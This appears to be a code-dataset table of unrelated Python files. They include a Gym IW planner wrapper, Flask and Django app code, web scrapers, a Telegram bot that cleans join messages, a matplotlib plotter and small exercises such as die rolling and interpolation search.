text stringlengths 8 6.05M |
|---|
import argparse
import sys
import os
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
from __gym_iw import __GymIwAgent
import gym
from gym import wrappers, logger
class GymIwAgent(__GymIwAgent):
    """GYM-IW agent.

    Thin Python-facing wrapper around the native __GymIwAgent base: every
    method simply forwards its keyword arguments to the base implementation,
    so this class mainly exists to carry documentation and a stable API.
    """

    def __init__(self,
                 environment,
                 planner,
                 encoding='byte',
                 space_relative_precision=0.001,
                 frameskip=1,
                 simulator_budget=150000,
                 time_budget=float('inf'),
                 novelty_subtables=False,
                 random_actions=False,
                 max_rep=30,
                 discount=1.0,
                 nodes_threshold=50000,
                 break_ties_using_rewards=False,
                 max_depth=1500,
                 debug_threshold=0,
                 random_seed=0,
                 logger_mode='info'):
        '''Constructor of Gym IW agents
        Parameters:
            environment (gym.Env): Gym environment
            planner (str): IW planner ('rollout-iw' or 'bfs-iw')
            encoding (str): Gym space encoding to feature atoms ('byte' or 'variable')
            space_relative_precision (float): relative precision of gym space variable-based encoding
            frameskip (int): frame skip rate
            simulator_budget (int): budget for #calls to simulator for online decision making
            time_budget (float): time budget for online decision making
            novelty_subtables (bool): use of single novelty table or novelty subtables
            random_actions (bool): use of random action when there are no rewards in look-ahead tree
            max_rep (int): max rep(etition) of features during lookahead
            discount (float): discount factor for lookahead
            nodes_threshold (int): threshold in #nodes for expanding look-ahead tree
            break_ties_using_rewards (bool): break ties in favor of better rewards during bfs-iw
            max_depth (int): max depth for lookahead
            debug_threshold (int): threshold for debug mode
            random_seed (int): random seed
            logger_mode (str): logger mode ('debug' or 'info' or 'warning' or 'error' or 'stats' or 'silent')
        '''
        super().__init__(environment=environment, planner=planner, encoding=encoding, space_relative_precision=space_relative_precision,
                         frameskip=frameskip, simulator_budget=simulator_budget, time_budget=time_budget, novelty_subtables=novelty_subtables,
                         random_actions=random_actions, max_rep=max_rep, discount=discount, nodes_threshold=nodes_threshold,
                         break_ties_using_rewards=break_ties_using_rewards, max_depth=max_depth, debug_threshold=debug_threshold,
                         random_seed=random_seed, logger_mode=logger_mode)

    def get_number_of_observation_feature_atoms(self):
        '''Get the number of observation feature atoms generated by the chosen encoding mode (set in __init__)
        Returns:
            int: number of observation feature atoms
        '''
        return super().get_number_of_observation_feature_atoms()

    def get_number_of_action_feature_atoms(self):
        '''Get the number of action feature atoms generated by the chosen encoding mode (set in __init__)
        Note: action feature atoms are not needed by the IW algorithms per se but it
              helps generate a finite set of actions in case of continuous action
              space (Gym specificity)
        Returns:
            int: number of action feature atoms
        '''
        return super().get_number_of_action_feature_atoms()

    def play(self,
             episodes=1,
             initial_random_noops=1,
             lookahead_caching=2,
             prefix_length_to_execute=0.0,
             execute_single_action=False,
             max_execution_length_in_frames=18000):
        '''Play a sequence of episodes
        Parameters:
            episodes (int): number of episodes
            initial_random_noops (int): max number of initial noops, actual number is sampled (must be greater than 0)
            lookahead_caching (int): lookahead caching (0=none, 1=partial, 2=full)
            prefix_length_to_execute (float): % of prefix to execute (default is 0 = execute until positive reward)
            execute_single_action (bool): execute only one action from best branch in lookahead (default is to execute prefix until first reward)
            max_execution_length_in_frames (int): max number of frames in single execution
        '''
        super().play(episodes=episodes, initial_random_noops=initial_random_noops, lookahead_caching=lookahead_caching,
                     prefix_length_to_execute=prefix_length_to_execute, execute_single_action=execute_single_action,
                     max_execution_length_in_frames=max_execution_length_in_frames)

    def start_episode(self, lookahead_caching=2):
        '''Start an episode in interactive mode (MUST be called before calling several act() functions)
        Parameters:
            lookahead_caching (int): lookahead caching (0=none, 1=partial, 2=full)
        '''
        super().start_episode(lookahead_caching=lookahead_caching)

    def act(self, observation, reward, done):
        '''Select the (planned) action to execute
        Parameters:
            observation (Gym space observation element): current Gym observation
            reward (float): last reward received from the Gym environment
            done (bool): whether the Gym environment has reached a terminal state
        Returns:
            the action chosen by the underlying planner (Gym action-space element)
        '''
        return super().act(observation=observation, reward=reward, done=done)

    def end_episode(self):
        '''End an episode in interactive mode (MUST be called after calling several act() functions)
        '''
        return super().end_episode()
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=None)
    parser.add_argument('env_id', nargs='?', default='CartPole-v0', help='Select the environment to run')
    parser.add_argument('planner', nargs='?', default='bfs-iw', help='Select the planner to run (rollout-iw or bfs-iw)')
    parser.add_argument('encoding', nargs='?', default='byte', help='Select the gym space encoding to feature atoms (byte or variable)')
    # BUG FIX: without type=float a user-supplied value arrived as a str
    # (argparse only applies the default unchanged), breaking the agent.
    parser.add_argument('space_relative_precision', nargs='?', type=float, default=0.001, help='Select the relative precision of gym space variable-based encoding')
    args = parser.parse_args()
    # You can set the level to logger.DEBUG or logger.WARN if you
    # want to change the amount of output.
    logger.set_level(logger.INFO)
    env = gym.make(args.env_id)
    # You provide the directory to write to (can be an existing
    # directory, including one with existing data -- all monitor files
    # will be namespaced). You can also dump to a tempdir if you'd
    # like: tempfile.mkdtemp().
    outdir = '/tmp/gym-iw-agent-results'
    #env = wrappers.Monitor(env, directory=outdir, force=True)
    env.seed(0)
    agent = GymIwAgent(environment=env, planner=args.planner, encoding=args.encoding, space_relative_precision=args.space_relative_precision)
    episode_count = 10
    for i in range(episode_count):
        reward = 0
        done = False
        ob = env.reset()
        env.render()
        agent.start_episode()
        while True:
            action = agent.act(ob, reward, done)
            ob, reward, done, _ = env.step(action)
            # BUG FIX: the original called env.close() after every render,
            # inside the episode loop, and then kept stepping the closed
            # environment; close only once at the very end.
            env.render()
            if done:
                break
        # Note there's no env.render() here. But the environment still can open window and
        # render if asked by env.monitor: it calls env.render('rgb_array') to record video.
        # Video is not recorded every episode, see
        # capped_cubic_video_schedule for details.
        agent.end_episode()
    # Close the env and write monitor result info to disk
    env.close()
|
from calendar import day_name, weekday

# Read a date as "month day year" from stdin and print the weekday name
# in upper case (HackerRank "What's Your Name"-style day finder).
month, day, year = (int(field) for field in input().split())
print(day_name[weekday(year, month, day)].upper())
|
# Generated by Django 2.0.2 on 2019-03-08 13:05
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Adds a required FK from delivery to its enterprise.

    dependencies = [
        ('enterprice', '0002_enterprice_user'),
        ('delivery', '0004_delivery_user'),
    ]

    operations = [
        migrations.AddField(
            model_name='delivery',
            name='enterprice',
            # NOTE(review): default=None with preserve_default=False means the
            # one-off default for existing rows is NULL on a NOT NULL FK —
            # this migration presumably ran against an empty delivery table;
            # confirm before reusing it elsewhere.
            field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='enterprice.EnterPrice', verbose_name='企业'),
            preserve_default=False,
        ),
    ]
|
from django.test import TestCase
from zipcodes.models import ZipCode
class ZipCodeModelTest(TestCase):
    """Unit tests for the ZipCode model."""

    def test_str_method_returns(self):
        """The string form of a ZipCode is its raw zip_code value."""
        self.zip_code = ZipCode(zip_code='14020260')
        self.assertEqual(str(self.zip_code), '14020260')
|
# Shared Flask extension singletons, initialised against the app elsewhere.
from flask_oauthlib.client import OAuth
oauth = OAuth()

# BUG FIX: the flask.ext.* namespace was removed in Flask 1.0; extensions
# must be imported from their own packages directly.
from flask_assets import Environment
assets = Environment()

# Change this to HerokuConfig if using Heroku.
from flask_appconfig import AppConfig
config = AppConfig()
|
# -*- coding:utf-8 -*-
# author: will
import logging
from flask import request, jsonify, g
from app import db, mongo_store
from app.models import Article
from celery_tasks.tasks import get_audio_baidu_test, get_audio_baidu
from utils.log_service import Logging
from utils.user_service.login import login_required, admin_required
from libs.xunfei import get_audio_xf
from . import api_article
# Convert articles to audio (text-to-speech via Baidu, dispatched to Celery).
@api_article.route('/get_audio', methods=['POST'])
@login_required
@admin_required
def get_audio():
    """Toggle or generate audio for a batch of articles.

    JSON body: article_id_list (list of ids), optional is_read (1 = cancel
    the audio state, otherwise re-enable or generate the audio).
    Returns a JSON envelope {errno, errmsg}.
    """
    try:
        res = request.get_json()
        article_id_list = res.get('article_id_list')
        is_read = res.get('is_read')  # when supplied (1), flips the audio state off
        admin_id = g.user_id
        Logging.logger.info('request_args:{0}'.format(res))
        for article_id in article_id_list:
            try:
                article_id = int(article_id)
            except Exception as e:
                logging.error(e)
                return jsonify(errno=-1, errmsg='传入文章ID错误')
            obj = Article.query.get(article_id)
            if not obj:
                return jsonify(errno=-1, errmsg='该文章不存在')
            # Update the audio/read state.
            if is_read == 1:
                # Cancel: mark the article as not read/voiced.
                obj.is_read = 0
                obj.admin_id = admin_id
                db.session.add(obj)
                db.session.commit()
                # return jsonify(errno=0, errmsg="取消音频成功")
            else:
                if obj.mp3_url:
                    # Audio was generated before and then cancelled (state 0);
                    # just re-enable it, no re-synthesis needed.
                    obj.is_read = 1
                    obj.admin_id = admin_id
                    db.session.add(obj)
                    db.session.commit()
                    # return jsonify(errno=0, errmsg="生成音频成功", mp3_url=obj.mp3_url)
                else:
                    # Generate new audio: pull the article body from Mongo by
                    # title and hand synthesis off to the Celery worker.
                    docs = mongo_store.articles.find({'title': obj.title})
                    doc = docs[0]
                    content = doc.get('content')
                    # get_audio_baidu_test.delay(article_id, content)
                    get_audio_baidu.delay(article_id, content)
                    obj.is_read = 1
                    obj.admin_id = admin_id
                    db.session.add(obj)
                    db.session.commit()
        return jsonify(errno=0, errmsg="ok")
    except Exception as e:
        Logging.logger.error('errmsg:{0}'.format(e))
        db.session.rollback()
        return jsonify(errno=-1, errmsg='网络异常')
# Xunfei (iFlytek) text-to-speech endpoint.
@api_article.route('/get_audio_xunfei', methods=['POST'])
@login_required
@admin_required
def get_audio_xunfei():
    """Synthesize speech for the posted text and return its mp3 URL."""
    try:
        payload = request.get_json()
        text = payload.get('data')
        mp3_url = get_audio_xf(text)
        if mp3_url is False:
            return jsonify(errno=-1, errmsg='合成失败')
        return jsonify(errno=0, errmsg="OK", mp3_url=mp3_url)
    except Exception as e:
        print(e)
        logging.error(e)
        return jsonify(errno=-1, errmsg='网络异常')
|
import myLib
import matplotlib.pyplot as plt
import datetime
import time
import csv
import threading
import numpy as np
class Plotter:
    """Live matplotlib view of a GVF learner.

    Two stacked plots: (1) angle / load / cumulant / prediction, and
    (2) error / post-hoc return / post-hoc prediction, plus a row of status
    text fields.  The class-level attributes below are shared hooks that the
    control loop overwrites with the latest measurements before each redraw.
    """
    controlTime = 0.0       # seconds spent in the last control step
    currentAngle = 0.0      # latest angle measurement
    currentLoad = 0.0       # latest load measurement
    numberOfActions = 0     # actions taken so far

    def __init__(self, GVFinput):
        """Store the GVF object whose signals will be plotted."""
        self.gvf = GVFinput
        #self.initPlotter()

    def saveFigure(self, fileName=None):
        """Save the current figure under figures/.

        BUG FIX: the original default argument was built with
        datetime.datetime.now() inside the signature, so it was evaluated
        once at class-definition time and every default-named figure reused
        the same stale timestamp.  Build the name per call instead.
        """
        if fileName is None:
            fileName = 'Figure_from_%s.png' % datetime.datetime.now()
        plt.savefig('figures/%s' % fileName)

    def initPlotGVF(self):
        """Create both subplots, their line objects, and the status texts."""
        plt.ion()  # Turn interactive on
        self.graphSpan = 100  # the width of the graph (samples shown)
        self.maxY = 25
        self.minY = -10
        x = np.arange(0, self.graphSpan)
        # Init the fig
        self.fig, (self.plot1Ax, self.plot2Ax) = plt.subplots(2)
        # init the data to be plotted
        self.angle = [0] * self.graphSpan
        self.load = [0] * self.graphSpan
        self.cumulant = [0] * self.graphSpan
        self.prediction = [0] * self.graphSpan
        # initial plot
        (self.angleLine, self.loadLine, self.cumulantLine, self.predictionLine) = self.plot1Ax.plot(x, self.angle, 'b', x, self.load, 'y', x, self.cumulant, 'g', x, self.prediction, 'r', linewidth=3)
        self.plot1Ax.axes.set_xlim(0, self.graphSpan)
        self.plot1Ax.axes.set_ylim(self.minY, self.maxY)
        self.angleLine.set_label('Angle')
        self.loadLine.set_label('Load')
        self.cumulantLine.set_label('Cumulant')
        self.predictionLine.set_label('Prediction')
        # Initialize the second graph -------------------------------------
        # init the data to be plotted
        self.error = [0] * self.graphSpan
        self.postReturn = [0] * self.graphSpan
        self.postPrediction = [0] * self.graphSpan
        # initial plot
        (self.errorLine, self.postReturnLine, self.postPredictionLine) = self.plot2Ax.plot(x, self.error, 'y', x, self.postReturn, 'g', x, self.postPrediction, 'r', linewidth=3)
        self.plot2Ax.axes.set_xlim(0, self.graphSpan)
        self.plot2Ax.axes.set_ylim(self.minY, self.maxY)
        self.errorLine.set_label("Error")
        self.postReturnLine.set_label('Post-hoc Prediction')
        self.postPredictionLine.set_label('Prediction')
        self.plot1Ax.axes.legend(bbox_to_anchor=(0, 1), loc='upper left', ncol=1)
        self.plot1Ax.axes.grid()
        self.plot2Ax.axes.legend(bbox_to_anchor=(0, 1), loc='upper left', ncol=1)
        self.plot2Ax.axes.grid()
        # Status text fields, positioned in data coordinates around the axes.
        self.controlTimeText = plt.text(0, self.minY - 5, "Time Control: " + str(0.0))
        self.gvfTimeText = plt.text(75, self.minY - 5, "Time GVF: " + str(0.0))
        self.elapsedTime = plt.text(56, self.minY - 5, "Elapsed Time: " + str(0.0))
        self.errorText = plt.text(38, self.minY - 5, "Error: " + str(0.0))
        self.avgErrorText = plt.text(18, self.minY - 5, "Avg Error: " + str(0.0))
        self.numLearnText = plt.text(2, self.minY + 4, "# Learn step: " + str(0.0))
        self.numActionsText = plt.text(32, self.minY + 4, "# Actions: " + str(0.0))
        self.trueReturnText = plt.text(52, self.minY + 4, "True Return: " + str(0.0))
        self.predictionText = plt.text(78, self.minY + 4, "Prediction: " + str(0.0))
        plt.pause(0.05)

    def runPlotGVF(self):
        """Append the latest samples and redraw both plots once.

        NOTE(review): the sample lists grow without bound (only the last
        graphSpan entries are displayed) — acceptable for short runs.
        """
        # take measurements
        currentAngle = self.currentAngle
        currentCumulant = self.gvf.cumulant
        currentPrediction = self.gvf.prediction
        currentLoad = self.currentLoad
        # add the newest to end of arrays
        self.angle.append(currentAngle)
        self.load.append(currentLoad)
        self.cumulant.append(currentCumulant)
        self.prediction.append(currentPrediction)
        self.angleLine.set_ydata(self.angle[-self.graphSpan:])
        self.loadLine.set_ydata(self.load[-self.graphSpan:])
        self.cumulantLine.set_ydata(self.cumulant[-self.graphSpan:])
        self.predictionLine.set_ydata(self.prediction[-self.graphSpan:])
        # SECOND PLOT ----------------------------------------------------
        # take measurements
        currentPostPrediction = self.gvf.postPrediction
        currentPostReturn = self.gvf.postReturn
        currentError = abs(currentPostReturn - currentPostPrediction)
        # add the newest to end of arrays
        self.error.append(currentError)
        self.postReturn.append(currentPostReturn)
        self.postPrediction.append(currentPostPrediction)
        self.errorLine.set_ydata(self.error[-self.graphSpan:])
        self.postReturnLine.set_ydata(self.postReturn[-self.graphSpan:])
        self.postPredictionLine.set_ydata(self.postPrediction[-self.graphSpan:])
        # refresh the status texts
        self.controlTimeText.set_text("Time Control: " + str(self.controlTime))
        self.gvfTimeText.set_text("Time GVF: " + str(self.gvf.timeDiff))
        self.errorText.set_text("Error: " + str(round(currentError, 4)))
        self.avgErrorText.set_text("Avg Error: " + str(round(self.gvf.averageError, 4)))
        self.elapsedTime.set_text("Run Time: " + str(round((time.time() - self.startTimeRun), 3)))
        self.numLearnText.set_text("# Learn Steps: " + str(self.gvf.numberOfLearningSteps))
        self.numActionsText.set_text("# Actions: " + str(self.numberOfActions))
        self.trueReturnText.set_text("True Return: " + str(self.gvf.postReturn))
        self.predictionText.set_text("Prediction: " + str(self.gvf.postPrediction))
        plt.pause(0.05)

    def plotGVF(self, stoppingEvent):
        """Plot continuously until *stoppingEvent* is set, then save the figure."""
        self.startTimeRun = time.time()
        self.initPlotGVF()
        while not stoppingEvent.is_set():
            self.runPlotGVF()
            #time.sleep(.5)
        self.saveFigure('GVF2__alpha_' + str(self.gvf.alpha) + '_tilings_' + str(self.gvf.numTilings) + '_gamma_' + str(self.gvf.gamma) + '_lambda_' + str(self.gvf.lamb) + '.png')

    def initPlotter(self):
        """One-shot setup for callers that drive plot() manually."""
        self.startTimeRun = time.time()
        self.initPlotGVF()

    def plot(self):
        """Redraw once (assumes initPlotter() was called first)."""
        self.runPlotGVF()
import sys
import os
import numpy as np
import time
def load_data(path):
    """Return the alphabetically sorted list of entry names in directory *path*.

    Fixes the pointless `path_dir = path` alias and replaces the manual
    list-then-sort with the sorted() idiom; behavior is unchanged.
    """
    return sorted(os.listdir(path))
# files means 00001, 00002, ``````
if __name__ == "__main__":
    # This module is a library; running it directly is unexpected.
    print("Error.. Why loadData Module execute")
'''
###############concatenate method######################
array_1 = np.array([1,2,3,4,5,6,7,8,9,10,11,12])
prev = array_1[0:3]
for i in range(1,int(len(array_1)/4)):
    prev = np.vstack([prev,array_1[4*i:4*i+3]])
print(prev)
'''
import requests
from bs4 import BeautifulSoup
def weather_init_soup():
    """Fetch the Naver weather search page (Seongdong-gu) and return its parsed soup."""
    weather_url = 'https://search.naver.com/search.naver?sm=top_hty&fbm=1&ie=utf8&query=%EC%84%B1%EB%8F%99%EA%B5%AC+%EB%82%A0%EC%94%A8'
    page = requests.get(weather_url)
    return BeautifulSoup(page.text, 'html.parser')
def get_thermal(soup):
    """Build a Korean status message with current/min/max temperature from *soup*.

    BUG FIX: the attrs arguments were set literals ({'class', 'todaytemp'})
    where dicts ({'class': 'todaytemp'}) were intended — the set form also
    matched elements whose class is literally 'class'.
    """
    now_ther = soup.find('span', {'class': 'todaytemp'}).text
    min_ther = soup.find('span', {'class': 'min'}).find('span', {'class': 'num'}).text
    max_ther = soup.find('span', {'class': 'max'}).find('span', {'class': 'num'}).text
    msg = f'현재 기온은 *{now_ther}*, 최저:{min_ther} 최고:{max_ther} ! '
    return msg
def get_weather(soup):
    """Build a Korean message describing the current weather from *soup*.

    BUG FIX: same set-literal-instead-of-dict attrs defect as get_thermal.
    """
    now_weather = soup.find('span', {'class': 'ico_state2'}).text
    if now_weather == '비':
        msg = '지금은 비가온다구 *우산*을 챙겨달라구 :umbrella:'
    else:
        msg = f'지금은 {now_weather}이라구 :racoon_man:'
    return msg
def hangang_temp():
    """Return a Korean message with the current Han River water temperature."""
    response = requests.get(url='https://www.wpws.kr/hangang/')
    soup = BeautifulSoup(response.text, 'html.parser')
    # BUG FIX: removed the leftover debug print(soup) that dumped the whole
    # fetched page to stdout on every call.
    get_hangang_data = soup.find('p', {'id': 'temp'}).text
    msg = f'{get_hangang_data} 라구 :droplet:'
    return msg
|
#!/usr/bin/python3
"""Reads a text file and prints it"""


def read_file(filename=""):
    """Print the entire UTF-8 text file *filename* to stdout, unmodified."""
    with open(filename, encoding="utf-8") as handle:
        print(handle.read(), end="")
|
import logging
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from telegram.error import TelegramError
# Enable logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__)
# Use your own API_TOKEN here
API_TOKEN = "TOKEN"
# Define a few command handlers. These usually take the two arguments update and
# context. Error handlers also receive the raised TelegramError object in error.
def start(update, context):
    """Reply with a greeting when the command /start is issued."""
    update.message.reply_text("Hello, I am the Thread Cleaner")
def help(update, context):
    """Send a message when the command /help is issued."""
    reply = 'This bot automatically removes all user joined messages in a group if made admin'
    update.message.reply_text(reply)
def error(update, context):
    """Log Errors caused by Updates."""
    # context.error carries the exception raised while handling the update.
    logger.warning('Update "%s" caused error "%s"', update, context.error)
def clean(update, context):
    """Delete the triggering status-update message; ignore API failures
    (e.g. the bot lacks delete rights or the message is already gone)."""
    msg = update.message
    try:
        context.bot.delete_message(msg.chat.id, msg.message_id)
    except TelegramError:
        pass
def main():
    """Wire up the handlers and run the bot until interrupted."""
    updater = Updater(token=API_TOKEN, use_context=True)
    dispatcher = updater.dispatcher

    # Command handlers.
    dispatcher.add_handler(CommandHandler("start", start))
    dispatcher.add_handler(CommandHandler("help", help))

    # Every status update (user joined/left, etc.) gets cleaned up.
    dispatcher.add_handler(MessageHandler(Filters.status_update, clean))

    # Log all errors raised while processing updates.
    dispatcher.add_error_handler(error)

    updater.start_polling()
    # Block until SIGINT/SIGTERM/SIGABRT so polling shuts down gracefully
    # (start_polling() itself is non-blocking).
    updater.idle()
if __name__ == '__main__':
main()
|
class AdmissionDetails(object):
    """Value object holding a student's admission degree, type, month and year.

    Each attribute is exposed through a property whose setter only accepts
    strings; assigning any other type raises ValueError.  The four setters
    shared identical copy-pasted validation, now factored into _require_str,
    and the type check uses isinstance (accepting str subclasses) instead of
    an exact type() comparison.
    """

    def __init__(self):
        self._AdmissionDegree = None
        self._AdmissionType = None
        self._AdmissionMonth = None
        self._AdmissionYear = None

    @staticmethod
    def _require_str(value, field):
        # Shared validator: every admission field must be a string.
        if not isinstance(value, str):
            raise ValueError('%s must be type String' % field)
        return str(value)

    @property
    def AdmissionDegree(self):
        return self._AdmissionDegree

    @AdmissionDegree.setter
    def AdmissionDegree(self, admissionDegree):
        self._AdmissionDegree = self._require_str(admissionDegree, 'AdmissionDegree')

    @property
    def AdmissionType(self):
        return self._AdmissionType

    @AdmissionType.setter
    def AdmissionType(self, admissionType):
        self._AdmissionType = self._require_str(admissionType, 'AdmissionType')

    @property
    def AdmissionMonth(self):
        return self._AdmissionMonth

    @AdmissionMonth.setter
    def AdmissionMonth(self, admissionMonth):
        self._AdmissionMonth = self._require_str(admissionMonth, 'AdmissionMonth')

    @property
    def AdmissionYear(self):
        return self._AdmissionYear

    @AdmissionYear.setter
    def AdmissionYear(self, admissionYear):
        self._AdmissionYear = self._require_str(admissionYear, 'AdmissionYear')
|
import pandas as pd

# Load the HR dataset and display it.
df = pd.read_csv("hrdata.csv")
# BUG FIX: 'ptint' was a typo for 'print' and raised NameError at runtime.
print(df)
import unittest
from katas.kyu_7.ordering_the_words import order_word
class OrderingTheWordsTestCase(unittest.TestCase):
    """Tests for order_word: it returns the input's characters sorted in
    ASCII order, or 'Invalid String!' for empty/None input."""

    def test_equals(self):
        self.assertEqual(order_word('Hello, World!'), ' !,HWdellloor')

    def test_equals_2(self):
        self.assertEqual(order_word('bobby'), 'bbboy')

    def test_equals_3(self):
        # Empty input is rejected, not sorted.
        self.assertEqual(order_word(''), 'Invalid String!')

    def test_equals_4(self):
        self.assertEqual(order_word('completesolution'), 'ceeillmnooopsttu')

    def test_equals_5(self):
        # Punctuation-only input still sorts by code point.
        self.assertEqual(order_word('\"][@!#$*(^&%'), '!\"#$%&(*@[]^')

    def test_equals_6(self):
        self.assertEqual(
            order_word('i\"d][@z!#$r(^a&world%'), '!\"#$%&(@[]^addilorrwz'
        )

    def test_equals_7(self):
        # None behaves like empty input.
        self.assertEqual(order_word(None), 'Invalid String!')
|
from collections import Counter

# Advent of Code 2019 day 8 part 1: split the digit stream into 25x6 layers,
# find the layer with the fewest 0 digits, and print (#1s * #2s) for it.
with open('input.txt') as my_file:
    # BUG FIX (idiom): renamed from `input`, which shadowed the builtin.
    data = my_file.readline()


def flatten(il):
    """Flatten one level of nesting: a list of lists into a flat list."""
    # (renamed the loop variable from `list`, which shadowed the builtin)
    return [item for sub in il for item in sub]


width, height = 25, 6
layers = int(len(data) / width / height)
# layer index -> height x width grid of digits
all_layers = {k: [[int(data[k * width * height + j * width + i])
                   for i in range(width)]
                  for j in range(height)]
              for k in range(layers)}
num_counts = {k: Counter(flatten(all_layers[k])) for k in all_layers.keys()}
min_zeros = min(num_counts[k][0] for k in num_counts.keys())
output_layer = dict(filter(lambda x: x[1][0] == min_zeros, num_counts.items()))
print([x[1] * x[2] for x in list(output_layer.values())][0])
|
# Author: Jack (z5129432) for COMP9021 Assignment 1
# Date: 23/08/2017
# Description:
'''
'''
import sys
# function: move
# input: null
# output: die[] after moved
def move_right(d=None):
    """Roll the die one cell to the right, mutating its face list in place.

    Parameters:
        d (list): 6-element face list [top, front, right, bottom, back, left];
                  defaults to the module-level ``die`` (generalized so the
                  function can also roll any caller-supplied die).
    """
    d = die if d is None else d
    snapshot = d[:]
    d[3] = snapshot[2]  # right becomes bottom
    d[2] = snapshot[0]  # top becomes right
    d[0] = snapshot[5]  # left becomes top
    d[5] = snapshot[3]  # bottom becomes left
def move_left(d=None):
    """Roll the die one cell to the left, mutating its face list in place.

    Parameters:
        d (list): 6-element face list [top, front, right, bottom, back, left];
                  defaults to the module-level ``die``.
    """
    d = die if d is None else d
    snapshot = d[:]
    d[0] = snapshot[2]  # right becomes top
    d[5] = snapshot[0]  # top becomes left
    d[3] = snapshot[5]  # left becomes bottom
    d[2] = snapshot[3]  # bottom becomes right
def move_forewards(d=None):
    """Roll the die one cell forwards, mutating its face list in place.

    Parameters:
        d (list): 6-element face list [top, front, right, bottom, back, left];
                  defaults to the module-level ``die``.
    """
    d = die if d is None else d
    snapshot = d[:]
    d[1] = snapshot[0]  # top becomes front
    d[3] = snapshot[1]  # front becomes bottom
    d[4] = snapshot[3]  # bottom becomes back
    d[0] = snapshot[4]  # back becomes top
def move_backwards(d=None):
    """Roll the die one cell backwards, mutating its face list in place.

    Parameters:
        d (list): 6-element face list [top, front, right, bottom, back, left];
                  defaults to the module-level ``die``.
    """
    d = die if d is None else d
    snapshot = d[:]
    d[4] = snapshot[0]  # top becomes back
    d[0] = snapshot[1]  # front becomes top
    d[1] = snapshot[3]  # bottom becomes front
    d[3] = snapshot[4]  # back becomes bottom
# user interface: input part
while True:
    try:
        cell = int(input('Enter the desired goal cell number: '))
        if cell <= 0:
            raise ValueError
        break
    except ValueError:
        print('Incorrect value, try again')
# initialize die[]
# top front right bottom back left
#  0    1     2     3     4    5
die = [3, 2, 1, 4, 5, 6]
# initialize moving step in one direction
step = 1
# initialize counter
i = cell
# simulate moving the die: walk an outward square spiral (right, forwards,
# left, backwards; the leg length grows by one every two turns) until the
# counter reaches the goal cell.
while(i > 1):
    for _ in range(0, step):  # moving right for "step" steps
        move_right()
        i -= 1
        if i <= 1:
            break
    if i <= 1:
        break
    for _ in range(0, step):  # moving forewards for "step" steps
        move_forewards()
        i -= 1
        if i <= 1:
            break
    if i <= 1:
        break
    step += 1  # increase step by 1
    for _ in range(0, step):  # moving left for "step" steps
        move_left()
        i -= 1
        if i <= 1:
            break
    if i <= 1:
        break
    for _ in range(0, step):  # moving backwards for "step" steps
        move_backwards()
        i -= 1
        if i <= 1:
            break
    step += 1  # increase step by 1
# user interface: output part
print(f'On cell {cell}, {die[0]} is at the top, {die[1]} at the front, and {die[2]} on the right.')
def interpolation_search(arr, x):
    """Return an index of *x* in the ascending-sorted list *arr*, or -1.

    Probes the position by linear interpolation between arr[low] and
    arr[high], so it needs numeric, sorted input.

    BUG FIX: when arr[low] == arr[high] with low < high (a run of equal
    values), the original probe divided by zero; a flat segment is now
    resolved directly (this also subsumes the old low == high check).
    """
    low = 0
    high = len(arr) - 1
    while low <= high and arr[low] <= x <= arr[high]:
        if arr[low] == arr[high]:
            # Flat segment (covers low == high too): every element equals
            # arr[low], so the answer is immediate — and the interpolation
            # denominator below would be zero.
            return low if arr[low] == x else -1
        pos = low + int(((float(high - low) / (arr[high] - arr[low])) * (x - arr[low])))
        if arr[pos] == x:
            return pos
        if arr[pos] < x:
            low = pos + 1
        else:
            high = pos - 1
    return -1
if __name__ == '__main__':
    # BUG FIX: interpolation search requires a sorted array; the original
    # demo passed the unsorted [12, 11, 13, 5, 6, 7] and wrongly reported
    # 11 as "not present" because the loop guard failed immediately.
    arr = [5, 6, 7, 11, 12, 13]
    x = 11
    result = interpolation_search(arr, x)
    if result != -1:
        print("Element is present at index", str(result))
    else:
        print("Element is not present in array")
|
# coding=utf8
import const
from . import base
import model
import sqlalchemy
import tornado.web
import requests
import re, json, os, sys, datetime, pickle
import itertools
class FetchDataHelper(base.FetchHelper):
    """ Fetch external offer data and map it into local models. """

    def fetch_product(self, offer_id, data=None, raw=False):
        """ Fetch product data.

        Returns a plain dict when *raw* is truthy, else a ProductModel
        built from it.  *data* lets callers reuse an already-fetched
        offer dict instead of refetching.
        """
        data = data or self.fetch_offer_dict(offer_id)
        print('%s fetch!' % offer_id)
        product = dict(
            offer_id = offer_id,
            subject = data['subject'],
            img_url = data['imageList'][0]['originalImageURI'],
            code = data['productFeatureList'].get('货号'),             # item number
            brand = data['productFeatureList'].get('品牌'),            # brand
            pattern = data['productFeatureList'].get('图案'),          # pattern
            fabric = data['productFeatureList'].get('面料名称'),        # fabric name
            fabric_content = data['productFeatureList'].get('主面料成分'),    # main fabric composition
            fabric_scale = data['productFeatureList'].get('主面料成分的含量'), # composition percentage
        )
        return raw and product or model.ProductModel(**product)

    def fetch_skus(self, offer_id=None, data=None, raw=False):
        """ Fetch sku data.

        Returns a list of plain dicts when *raw* is truthy, else a list of
        SkuModel instances.  Price falls back to the offer-level display
        price when the sku has no discount price.
        """
        data = data or self.fetch_offer_dict(offer_id)
        skus = []
        for sku in data['skuMap'] or []:
            skus.append(dict(
                color = sku.get('color'),
                size = sku.get('size'),
                book_count = sku.get('canBookCount'),
                sale_count = sku.get('saleCount'),
                price = sku.get('discountPrice', data.get('priceDisplay')),
            ))
        return raw and skus or [model.SkuModel(**sku) for sku in skus]
class ProductHandler(base.BaseHelper):
    """Single-product page: view (GET), edit fields (POST), remove (DELETE)."""

    def get(self, product_id):
        """Render the product page; renders nothing when the id is unknown."""
        product = self.db.query(model.ProductModel).filter_by(id=product_id).first()
        if product:
            self.render('ledia/product.html', product=product)

    def post(self, product_id):
        """Update arbitrary product fields from the request arguments."""
        response = {'error': '', 'data': {}}
        for product in self.db.query(model.ProductModel).filter_by(id=product_id):
            for key in self.request.arguments:
                value = self.get_argument(key)
                setattr(product, key, value)
                self.db.commit()
                response['data'][key] = value
        return self.write(response)

    def delete(self, product_id):
        """Delete matching products, their rows, and their thumbnail images."""
        for product in self.db.query(model.ProductModel).filter_by(id=product_id):
            print(product)
            self.db.delete(product)
            self.db.commit()
